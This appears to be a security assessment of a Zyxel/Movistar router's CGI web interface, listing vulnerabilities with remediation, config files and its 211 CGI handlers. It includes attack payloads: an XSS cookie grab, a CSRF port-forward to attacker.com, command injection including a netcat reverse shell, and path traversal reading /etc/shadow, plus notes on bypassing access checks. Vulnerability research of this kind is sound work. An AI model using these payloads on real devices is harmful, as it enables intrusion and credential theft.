| No CSRF protection | CRITICAL | 8.1 | Easy | Unauthorized config changes |
| Weak password hash ($p$root) | CRITICAL | 9.1 | Medium | Full device compromise |
| Potential command injection (ping.cgi) | HIGH | 8.8 | Medium | Remote code execution |
| Path traversal (file browsers) | HIGH | 7.5 | Medium | Sensitive file disclosure |
| No HTTPS enforcement | HIGH | 7.4 | Medium | Credential interception |
| Session fixation possible | MEDIUM | 6.5 | Medium | Session hijacking |
| Verbose error messages | MEDIUM | 5.3 | Easy | Information disclosure |
| Debug features in production | MEDIUM | 6.1 | Hard | Potential bypass mechanisms |
| Telnet support | MEDIUM | 6.5 | Medium | Unencrypted access |
Affected Versions:
- jQuery 1.3.2 - CVE-2007-2379, multiple XSS issues
- jQuery 1.6.3 - CVE-2011-4969 (location.hash XSS)
Exploitation:
<!-- Trigger XSS via jQuery selector -->
http://192.168.1.1/page#<img src=x onerror=alert(document.cookie)>Impact:
- Session cookie theft
- Account takeover
- CSRF bypass
- Malicious actions as authenticated user
Remediation:
- Update all jQuery to 3.6.3+
- Remove jQuery 1.x versions
- Implement Content Security Policy (CSP)
Missing Protection:
- No CSRF tokens found in forms
- No SameSite cookie attribute
- No Referer validation
Exploitation:
<!-- Attacker site triggers config change -->
<img src="http://192.168.1.1/cgi-bin/portForwarding_add.cgi?port=22&ip=attacker.com">Impact:
- Unauthorized firewall rule changes
- Port forwarding to attacker
- WiFi password changes
- Admin account creation
Remediation:
- Implement CSRF tokens (per-session random value)
- Validate Referer header
- Use SameSite=Strict cookie attribute
- Require password for sensitive operations
Issues:
- Password hash format
$p$rootnon-standard - May be simple hash or placeholder
- No account lockout mechanism confirmed
- No 2FA/MFA support
Exploitation:
- Brute force attack on login
- Dictionary attack
- Credential stuffing
Remediation:
- Use bcrypt/scrypt for password hashing
- Implement account lockout (5 failed attempts)
- Add CAPTCHA after failed attempts
- Support 2FA/TOTP
Vulnerable CGIs (suspected):
ping.cgi- Likely executes systempingcommandDiagGeneral.cgi- May run diagnostic commandsmirror.cgi- Port mirroring configuration
Exploitation:
POST /cgi-bin/ping.cgi HTTP/1.1
target=8.8.8.8; cat /etc/passwd
target=8.8.8.8 | nc attacker.com 4444 -e /bin/shRemediation:
- Use safe APIs (no shell execution)
- Whitelist input (IP addresses only)
- Escape all shell metacharacters
- Use parameterized execution
Vulnerable CGIs:
fileSharing_browse.cgi- File browserviewlog.cgi- Log viewerbackupRestore.cgi- Config file access
Exploitation:
GET /cgi-bin/viewlog.cgi?file=../../../etc/shadow HTTP/1.1
GET /cgi-bin/fileSharing_browse.cgi?path=../../../../etc/passwd HTTP/1.1Remediation:
- Validate file paths against whitelist
- Use chroot for file operations
- Canonicalize paths (realpath())
- Deny
..in all file parameters
/usr/shared/web/html/config.json:
{
"CONFIG": {
"Implementation": "api",
"DefaultLanguage": "pt",
"Branding": "movistar",
"Country": "ES",
"LANGUAGES": [
{"file": "language.en.json", "shortName": "en"},
{"file": "language.pt.json", "shortName": "pt"}
],
"SessionMaxTime": 600,
"SessionWarning": false,
"UpdateStep": 10,
"VENDORCONFIGURATION": {
"Availability": true,
"Link": "http://192.168.1.1/main.html"
},
"LanConfEnabled": true,
"Supported3G": true,
"ManualPPPoE": true
}
}Key Settings:
- Session timeout: 600 seconds (10 minutes)
- Default language: Portuguese
- Branding: Movistar (Telefonica)
- 3G support: Enabled
- Manual PPPoE: Enabled
Runtime generated at:
/etc/mini_httpd1.conf/etc/mini_httpd2.conf/etc/mini_httpd3.conf/etc/mini_httpd4.conf
Expected Configuration:
port=80
ssl_port=443
ssl_cert=/etc/mycert/web.pem
chroot=/usr/shared/web
user=nobody
cgipat=/cgi-bin/*
pidfile=/tmp/mini_httpd1.pid
logfile=/tmp/mini_httpd1.log
/etc/config/rpcd:
config rpcd
option socket /var/run/ubus/ubus.sock
option timeout 30
config login
option username 'root'
option password '$p$root'
list read '*'
list write '*'
-
Update jQuery Libraries
- Remove jQuery 1.x versions
- Use only jQuery 3.6.3
- Test all JavaScript functionality
-
Implement CSRF Protection
- Generate random token per session
- Include in all forms as hidden field
- Validate token on all state-changing requests
-
Strengthen Authentication
- Replace
$p$rootwith proper bcrypt hash - Implement account lockout (5 attempts)
- Force password change on first login
- Replace
-
Enforce HTTPS
- Redirect HTTP → HTTPS automatically
- Set HSTS header
- Use secure cookies only
-
Input Validation Audit
- Review all 211 CGI binaries
- Implement whitelist validation
- Add length limits
-
Add Security Headers
Content-Security-Policy: default-src 'self' X-Frame-Options: DENY X-Content-Type-Options: nosniff Strict-Transport-Security: max-age=31536000 -
Session Security
- Add SameSite=Strict to cookies
- Bind sessions to IP addresses (already done)
- Regenerate SessionKey on privilege escalation
-
Disable Unnecessary Services
- Disable Telnet (use SSH only)
- Disable debug endpoints
- Remove HTTP server instances 2-4 if unused
-
Code Audit
- Static analysis of all CGI binaries
- Penetration testing
- Fuzzing file upload handlers
-
Architecture Improvements
- Migrate to modern web framework (React/Vue + REST API)
- Separate frontend from backend
- Use JSON API instead of CGI
-
Monitoring & Logging
- Log all authentication attempts
- Alert on failed login patterns
- SIEM integration
-
Regular Updates
- Automated dependency scanning
- Security patch pipeline
- CVE monitoring
- login_advance.cgi
- logout_advance.cgi
- passLogout.cgi
- doregister.cgi
- clear_first_access.asp
- indexmain.cgi
- menuJson.cgi
- naviView_partialLoad.cgi
- info.cgi
- current.cgi
- statusview.cgi
- networkMap.cgi
- broadband.cgi
- connection_icon_list.cgi
- connection_table_list.cgi
- connectionStatus_p1.cgi
- wanRemoteNode_ETH_Edit.cgi
- wanRemoteNode_GPON_Edit.cgi
- lanSetup.cgi
- ipv6LanSetup.cgi
- dhcp_static_list.cgi
- staticDHCP_add.cgi
- staticDHCP.cgi
- ipalias.cgi
- wlan_general.cgi
- wlan_MACAuthentication.cgi
- wlan_macfilter_add.cgi
- wlan_macfilter_edit.cgi
- wlan_mac_address_list.cgi (+ 1,2,3 variants)
- wlan_moreAP.cgi
- wlan_moreap_edit.cgi
- wlan_others.cgi
- wlan_wps.cgi
- wlan_wpsinfo.cgi
- wlan_WpsStatus.cgi
- wlan_WPStimerRunning.cgi
- wlan_staionInfo.cgi
- wlan_staionInfo_list.cgi (+ 1,2,3 variants)
- moreApStatus.cgi
- wlan5_* (mirrors all 2.4GHz CGIs)
- wlan_scheduling.cgi
- wlan_schedule_add/edit/delete.cgi
- EasyMesh.cgi
- qos_general.cgi
- qos_class.cgi
- qos_queue.cgi
- qos_shaper.cgi
- qos_class_add.cgi
- queue_add.cgi
- shaper_add.cgi
- NAT_General.cgi
- NAT_AddrMapping.cgi
- nat.cgi
- portForwarding.cgi (+ add/edit/list/delete variants)
- portTriggering.cgi (+ add/edit/list variants)
- dmz.cgi
- addrMap_add.cgi
- static.cgi (+ add/list variants)
- ipv6static.cgi (+ add/list variants)
- dns_routing.cgi (+ add/list variants)
- gretunnel.cgi (+ add/list variants)
- ipTunnel.cgi
- dynamicDNS_InadynV2.cgi
- dynamicDNS_InterfaceIndex.cgi
- upnp.cgi
- current_upnp_table.cgi
- TELFirewall_*.cgi (13 variants)
- TR181Firewall.cgi (+ RuleEdit variant)
- IP_MAC_Filter.cgi
- ipMacFilterList.cgi
- URL_Filter.cgi (+ Edit/list/delete variants)
- Keyword_Filter_list.cgi
- ParentalControl.cgi
- ParentalControladd.cgi
- ParentalControl_view.cgi
- localCA.cgi (+ frame variant)
- trustedCA.cgi (+ add/view variants)
- sshCA_list.cgi
- sipServiceProvider.cgi (+ setting/list variants)
- sipAccount.cgi (+ setting/list variants)
- SIP_ALG.cgi
- phone.cgi
- callRule.cgi (+ CO variant)
- VoIPStatus.cgi (+ list variant)
- traffic_wan/lan/nat.cgi (+ frame variants)
- viewlog.cgi
- ViewSyslog.cgi
- RemMag*.cgi (General, WWW, WWW4Airtel, SNMP, DNS, ICMP, SSH, TELNET)
- backupRestore.cgi
- reboot.cgi (+ info variant)
- system.cgi
- time.cgi
- DiagGeneral.cgi
- ping.cgi
- mirror.cgi
- logSet.cgi
- zlog.cgi
- firewareUpgrade.cgi
- Fireware_UpgradesManaged.cgi
- tr69cfg.cgi
- tr369.cgi
- agentMTP.cgi (+ list variant)
- controller.cgi (+ list variant)
- stompConn.cgi (+ list variant)
- mqttClient.cgi (+ list variant)
- fileSharing.cgi (+ add/mod/del/list/browse variants)
- fileuser_*.cgi (add/mod/del/list variants)
- printServer.cgi
- userAccount.cgi
- PCP_ClientListIndex.cgi (+ view variant)
- PCP_list.cgi
- pcplist.cgi
- gponPassword.cgi
- vd.cgi
- vdview.cgi
- tabFW.cgi
- delete.cgi
- delete_RuleSum.cgi
- autofw_notify.asp (+ check variant)
- schedule_list.cgi
Total: 211 CGI binaries
InternetGatewayDevice.
├── DeviceInfo.
│ ├── ManufacturerOUI
│ ├── SerialNumber
│ └── SoftwareVersion
├── Layer3Forwarding.
│ └── Forwarding.{i}
├── LANDevice.{i}.
│ ├── WLANConfiguration.{i}.
│ │ ├── SSID
│ │ ├── BeaconType
│ │ └── ...
│ └── X_5067F0_IPv6LANHostConfigManagement.
├── WANDevice.{i}.
│ ├── WANConnectionDevice.{i}.
│ └── ...
├── X_5067F0_Ext.
│ ├── LoginPrivilegeMgmt.{i}
│ ├── Print
│ ├── FTP
│ └── ...
├── ManagementServer.
│ └── X_5067F0_CAContent
├── Mos.
│ └── MosUserConfig.
├── QoS.
├── Time.
├── IGMP.
└── ...
Note: X_5067F0_ prefix indicates vendor-specific extensions (5067F0 = Zyxel vendor code in hex)
Document Version: 2.0 Last Updated: 2025-10-06 Total Pages Documented: 38 page categories Total CGI Handlers: 211 Vulnerabilities Identified: 10 major issues Classification: Security Research - Confidential
The remote management CGI scripts (RemMagTELNET.cgi, etc.) should start with lowercase 'r'
(e.g. remMagTELNET.cgi instead of RemMagTELNET.cgi), otherwise the server returns 404 Not Found.
Using the correct lowercase version (remMagTELNET.cgi) produces a 402 forbidden error,
indicating the URL itself is valid, the remaining issue appears to be related to HTTP Referer
header validation.